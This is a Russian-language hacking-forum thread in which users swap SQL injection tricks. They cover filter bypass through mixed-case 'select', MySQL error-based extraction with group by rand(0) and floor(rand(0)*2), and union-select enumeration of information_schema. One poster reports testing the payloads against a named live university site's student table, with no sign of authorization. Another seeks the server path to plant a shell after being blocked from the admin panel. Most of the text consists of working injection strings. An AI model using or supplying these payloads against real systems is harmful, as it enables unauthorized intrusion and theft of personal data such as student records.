-----ЭТО ИЗОБРАЖЕНИЕ----- -----ЭТО ИЗОБРАЖЕНИЕ----- Да и я вроде не тебе писал про тот сайт Скинь адрес сайта в личку, гляну.
попугай здесь проблема не в этом, в админку не входит (403) , остается версия шелла.. на сервере других сайтов нету,вывод ошибок отключено.. можно ли узнать полный путь до сайта? oga
Почему запрос к MsSql &Pd=1+or+1=@@version проходит а &Pd=1+or+1=(select db_name()) уже нет??? ничего не выдает и редирект сразу!
Bb0y как это можно обойти?? И когда делаю запрос &Pd=1+or+1=() редиректа нету, я не думаю что все таки фильтруются!!
Да select фильтруется. Если не скобки, то что ещё там может фильтроваться? seLEcT попробуй вбить. // Постом отправить.
Эксперементирую с group by rand()... На 5 версии Code: select count(0) from table group by concat(version(),[COLOR=Orange]x[/COLOR]) x = floor(rand(0)*2) или rand(0)|0 или rand(0)&1 или rand()^0 выдает Duplicate entry x = rand(0) выполняется без ошибок. Решил проверить на 4 версии. (Проверял на сайте http://decanat5.ssau.ru/search_student в sql-inj) И вот тут результаты просто поставили в ступор Code: ' union select 1,count(*),3 from student group by concat([COLOR=Orange]version()[/COLOR],rand(0))/* Выдает Duplicate entry, а Code: ' union select 1,count(*),3 from student group by concat([COLOR=Orange](select 1)[/COLOR],rand(0))/* нет. В то время как Code: ' union select 1,count(*),3 from student group by concat([COLOR=Orange]version(),(select 1)[/COLOR],rand(0))/* выдает Duplicate entry, а Code: ' union select 1,count(*),3 from student group by concat([COLOR=Orange]version(),(select studentid from student limit 1)[/COLOR],rand(0))/* нет. Так вот вопрос) 1) Почему на 4 версии иногда прокатывает с rand(0), а на 5, сколько не пытался, так и не получилось 2) Почему с floor(rand(0)*2) прокатывает всегда, а с теми же rand(0)|0 работает только на 5 версии 3) Почему вот такой запрос не выдает ошибку, не смотря на то что там floor(rand(0)*2) Code: ' and (1) = (select count(*) from student group by floor(rand(0)*2))/*
GOGA075, пробуй что то типа этого: ?id=(1)and(1)=(0)union(select(null),table_name,(null)from(information_schema.tables)limit 28,1--)
1) На 5, работает практически так же, как и на 4, попадется пример, скину в пм. 2) Самый вероятный вариант, это то, что в 4 версии, символ "|" интерпретируется иначе. 3) По поводу почему у тебя выдает ошибку в случаях, когда её быть не должно. Я полагаю, в union select у тебя идет объединение колонки studentid, которая уже используется в запросе, в результате чего union со своим свойством делейт-дубликат конфликтует и возвращает false в массив, По сути потому что у тебя идёт повторная выборка. Как-то так
